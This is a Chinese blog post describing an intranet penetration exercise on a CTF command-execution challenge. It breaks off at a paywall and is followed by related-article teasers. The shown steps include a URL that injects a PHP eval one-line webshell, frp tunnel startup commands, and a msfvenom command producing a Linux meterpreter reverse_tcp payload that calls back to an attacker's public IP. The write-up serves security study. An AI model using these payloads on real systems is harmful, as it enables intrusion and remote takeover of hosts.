【原创】内网穿透案例

原创

已于 2023-10-11 17:51:46 修改 · 233 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#linux #服务器 #网络

于 2023-03-16 20:20:55 首次发布

本文详细介绍了两个内网穿透案例，包括使用Frp进行内网访问和扫描，以及CFS三层内网漫游的渗透过程。涉及到frp转发、制作Linux后门、添加路由、socks代理、nmap扫描等关键步骤，适用于网络安全学习者提升技能。

案列一（Frp内网渗透）

大概图列网上随便找的，路线是这个样子

这里选用ctfshow的一道命令执行题

由Frp实现内网访问及扫描

点击此处即可无偿领取282G网络安全学习资料

1.传入一句话，上线蚁剑

http://b85fdf24-b98e-4810-9e76-a038a8987630.challenge.ctf.show:8080/?c=`echo '<?php eval(\$_POST[1]);?>' > 1.php`;

2.进行frp转发

先服务器启动

./frps -c frps.ini

然后再kali启动

./frpc -c frpc.ini

3.制作linux马上线msf

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=公网ip LPORT=6000 -f  elf > shell.elf

直接拖进去并更改权限

kali开启监听

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

万天峰

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

华为综合实验02-某科研院网络路由实验（OSPF、BGP、EBGP、BFD、NAT、DHCP等）——傅老师eNSP经典实验系列

傅老师的运维技术空间

01-12

2666

eNSP经典综合实验系列之项目02-某科研院网络路由实验。涉及OSPF、BGP、EBGP、BFD、VLAN、DHCP等技能的综合应用。超值超经典！

frp 内网穿透 多系统多模式（详细+多个应用）

ziqibit的博客

03-13

3万+

frp内网穿透的跨平台，多模式（包括点对点）的超详细教程，可直接复制使用

参与评论您还未登录，请先登录后发表或查看评论

补发&frp内网穿透(socks隧道)

2301_76227305的博客

03-07

1416

ok啊兄弟们，也是成功解决这个问题了。最后，以上仅为个人的拙见，如何有不对的地方，欢迎各位师傅指正与补充，有兴趣的师傅可以一起交流学习。

使用msfvenom实现远程控制.

2301_78457119的博客

06-24

1164

在Kali 2中生成被控端的工具：msfvenom（msfvenom是渗透测试工具Metasploit中的一个命令）1、查看帮助信息、查2.看所有可以使用的攻击模块3、筛选出使用reverse_tcp的模块。

Frp 内网穿透服务器在渗透中的应用

weixin_46035615的博客

05-08

1510

内容实战-在内网发布服务使之可在公网访问使用 frp 搭建内网穿透服务器 实战-kali 配置 MSF 接收来自公网的 shell 实战-跨网段获取内网 shell 实战-内网穿透-二级代理实战-内网穿透-三级代理

十分钟教你配置frp实现内网穿透

热门推荐

诗雨远方的博客

11-30

46万+

十分钟教你配置frp实现内网穿透 一、frp的作用利用处于内网或防火墙后的机器，对外网环境提供 http 或 https 服务。对于 http, https 服务支持基于域名的虚拟主机，支持自定义域名绑定，使多个域名可以共用一个80端口。利用处于内网或防火墙后的机器，对外网环境提供 tcp 和 udp 服务，例如在家里通过 ssh 访问处于公司内网环境内的主机。二、配置说明 1、...

UDP打洞技术深度剖析：NAT穿透原理与实践

在代码的世界里，每天进步1%

11-18

770

本文深入探讨了P2P网络中NAT穿透的关键技术与实现方法。首先分析了NAT的四种类型（完全锥形、受限锥形、端口受限锥形和对称型）及其对P2P连接成功率的影响。重点介绍了UDP打洞技术的核心原理：通过协调服务器交换双方公网地址后，两端同时发送UDP包触发NAT端口映射，从而建立直连。文章还提供了STUN服务器和P2P客户端的Python实现代码示例，展示了完整的NAT穿透流程。这些技术可以有效解决P2P应用在NAT环境下的连接难题，为视频通话、文件传输等场景提供可靠支持。

IPSec 协议原理详解与实战配置（含华为路由器实验）

软考网工备考中？钱工带你轻松学！

09-26

1249

本文全面解析 IPSec，涵盖核心概念（SA、AH、ESP、IKE）、传输与隧道模式，通过 Linux StrongSwan、华为路由器实战演示配置，还讲解常见问题排查，助力理解传统 VPN 与新一代网络安全技术。

基于SpringBoot+Vue的共享云音乐平台设计与实现

利用frp实现内网穿透，超级简单使用

weixin_45775077的博客

03-15

1526

frp内网穿透步骤： 1、下载对应系统的frp应用（linux，windows） 2、服务器只需要解压，配置，启动（linux） 3、客户端也是解压，配置，启动（windows） 4、浏览器访问公网ip或域名成功内网穿透 一、下载frp应用下载地址是https://github.com/fatedier/frp/releases 例如（linux）：wget https://github.c...

msfvenom的使用&免杀&外网渗透

`or 1 or 不正经の泡泡

03-13

7424

msfvenom的基本使用这玩意是啥我就不介绍了,懂得都懂. 这篇博客将结合我本人的自身经验来说明大致的使用方式,这里的话只介绍,目前比较常用的几个方法和参数. payload 查看与使用 payload你可以理解为就是一种攻击的方案,生成何种攻击方式,对那种平台进行攻击使用参数 -p来进行设置, 查看为-l payload具体的看如下案例 encoders的使用参数 -e 这个是指选择何种方式编码,提高木马免杀的概率,此外还有参数 -i -b 不过有本人亲测使用-e即可,甚至不用指定,原因是无论你

作为内网杀手的metasploit如何在外网使用呢？

qq284489030的博客

05-09

5389

经常使用metsploit的同学可能会有疑问，为啥我只能在同一局域网里面进行渗透主机呢？这主要是因为你的身处于内网之中。不知道大家对内网和外网的理解是什么？这里我给大家普及一下吧！经常使用metsploit的同学可能会有疑问，为啥我只能在同一局域网里面进行渗透主机呢？…… 这主要是因为你的身处于内网之中。不知道大家对内网和外网的理解是什么？这里我给大家普及一下吧！什么是内网?内网接入方...

利用FRP实现内网穿透

Movle

06-12

798

情况：自己有两台电脑，一台16G内存的Dell，和一台8G内存的MacBook Pro，因为自己学的是大数据开发，所以需要搭建大数据集群，因此在MacBook Pro开发的话内存太小了，既要用虚拟机搭建大数据集群，又要用IDEA开发的话，内存是肯定不够的，所以之前是在Dell上面创建虚拟机，搭建大数据集群，然后再在MacBook Pro上开发，因为虚拟机使用的桥接法上网，Macbook Pro和Dell又在同一个局域网里，所以还可以，但是如果需要离开，区别的地方的话，自己就需要带两台电脑了，太沉了，所以.

使用frp配置内网访问（穿透）教程（超详细，简单）

Lisen’s blog

10-24

25万+

1 Frp介绍 frp 是一个开源、简洁易用、高性能的内网穿透和反向代理软件，支持 tcp, udp, http, https等协议。frp 项目官网是 https://github.com/fatedier/frp， frp工作原理服务端运行，监听一个主端口，等待客户端的连接；客户端连接到服务端的主端口，同时告诉服务端要监听的端口和转发类型；服务端fork新的进程监听客户端指定的端口；外网用户连接到客户端指定的端口，服务端通过和客户端的连接将数据转发到客户端；客户端进程再将数据转发到本地服务，

隧道技术 Frp 多层内网穿透

Love&Share

12-21

5542

文章目录Frp穿透Frp多层内网实战实验环境操作第一层隧道第二层隧道 Frp穿透项目地址：https://github.com/fatedier/frp 中文文档：https://gofrp.org/docs/ frp 是一个可用于内网穿透的高性能的全平台反向代理应用，支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网 frp 采用 Golang 编写，支持跨平台，仅需下载对应平台的二进制文件即可执行，没有额外依赖 F.

frp内网穿透工具安装和详解

qq_41248529的博客

05-10

3763

有些api的调用或者联调需要公网IP才能进行，这样一来不得不将代码部署到服务器进行访问，这样做是比较繁琐和麻烦的，所以实际开发过程中，一般是购买内网映射工具（比如花生壳），这样花费成本比较高。如果我们购买了一台带有公网的ip地址，比如阿里云，搭建一个开源的内网穿透工具，将固定的ip映射到转发到本地，是不是可以节省很多成本，而且也方便本地联调。关于正向代理和反向代理原理一搜一大把，个人建议大家了...

内网穿透工具---frp使用教程

u011215939的博客

12-04

3万+

前言最近在研究内网渗透的一些东西，碰到了需要内网穿透的情况，使用了几款工具后，就来总结一下啦。介绍frp frp 是一个可用于内网穿透的高性能的反向代理应用，支持 tcp, udp, http, https 协议。 1、利用处于内网或防火墙后的机器，对外网环境提供 http 或 https 服务。 2、对于 http, https 服务支持基于域名的虚拟主机，支持自定义域名绑定，使多个域名可...

Linux SSH配置密钥文件及免密登录

Tongyao

12-18

103

本文介绍了配置SSH免密登录的详细步骤：1）使用ssh-keygen生成RSA密钥对；2）将公钥加入authorized_keys文件；3）在A机器上传B机器私钥至.ssh目录；4）设置密钥权限为600；5）配置~/.ssh/config文件指定主机、用户和密钥路径；6）通过简化命令实现免密登录。整个过程强调了密钥权限设置的重要性，并提供了完整的配置示例。

Linux线上服务器掉电后无法启动故障的分析与修复实践——及其隐患解决（标准分区扩容、逻辑分区缩容与扩容）